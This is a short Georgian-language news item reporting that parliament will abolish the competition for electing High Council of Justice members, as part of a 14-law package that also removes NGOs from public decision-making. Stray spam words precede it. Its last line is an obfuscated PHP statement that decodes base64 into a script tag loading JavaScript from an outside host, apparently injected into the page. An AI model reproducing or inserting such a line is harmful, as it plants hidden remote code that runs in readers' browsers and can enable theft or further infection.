tube
ავერსი jaluzi

პარლამენტი იუსტიციის უმაღლესი საბჭოს წევრების ასარჩევად კონკურსს აღარ გამოაცხადებს. პარლამენტის რეგლამენტში დაგეგმილი ცვლილებების ფარგლებში კონკურსის წესი უქმდება. იუსტიციის უმაღლესი საბჭოს 5 წევრის არჩევა კი, კონკურსის ნაცვლად, ფრაქციის ან პარლამენტის უფრაქციო წევრთა არანაკლებ შვიდ კაციანი ჯგუფის წარდგინებით მოხდება.

აღნიშნული საკითხი გათვალისწინებულია საკანონმდებლო პაკეტის ფარგლებში, რომლის ამოქმედების შედეგად, არასამთავრობო ორგანიზაციები საჯარო გადაწყვეტილებების მიღების პროცესში ჩართული აღარ იქნება.

ამ მიმართულებით ცვლილება 14 სხვადასხვა კანონში შედის. ინიციატორი “ქართული ოცნების“ და “ხალხის ძალის“ დეპუტატები არიან.

121
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");